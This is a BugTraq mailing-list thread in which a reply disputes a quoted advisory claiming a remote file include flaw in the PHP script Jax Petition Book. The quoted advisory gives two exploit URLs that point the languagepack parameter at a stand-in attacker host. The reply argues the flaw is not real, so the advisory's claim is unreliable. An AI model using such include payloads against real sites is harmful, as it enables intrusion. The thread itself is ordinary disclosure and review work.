BugTraq
Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 14 2007 06:30PM
ilkerkandemir mynet com (1 replies)
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 15 2007 10:13PM
bmatheny mobocracy net (1 replies)
This is not a vulnerability. Since $languagepack is prefixed by "language/",
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?
> ------------------------------------------------------------------------
------------------------------------------
>
> AYYILDIZ.ORG PreSents...
>
>
> *Script: Jax Petition Book
> *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip
>
> *Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
>
> ------------------------------------------------------------------------
-------------------------------------------
>
> *Code:
>
> require ( "language/" .$languagepack . ".inc.php" );
>
> ------------------------------------------------------------------------
-------------------------------------------
>
> *Exploit:
>
> jax_petitionbook.php?languagepack=http://attacker.txt?
> smileys.php?languagepack=http://attacker.txt?
>
> ------------------------------------------------------------------------
-------------------------------------------
>
> Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
> Special Tnx: AYYILDIZ.ORG

--
Blake Matheny
bmatheny (at) mobocracy (dot) net [email concealed]
http://mobocracy.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFq/xx+1RMaZNdlgURAt9IAJsEXfACAaxXQKBgkjmFEk3ANi7trACggzpB
CAC+9oxPxvKwEfBE8VVnSNU=
=7+Bz
-----END PGP SIGNATURE-----

[ reply ]
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 16 2007 06:51PM
John McGuire (bugtraq greeneandassoc com)


 

Privacy Statement
Copyright 2010, SecurityFocus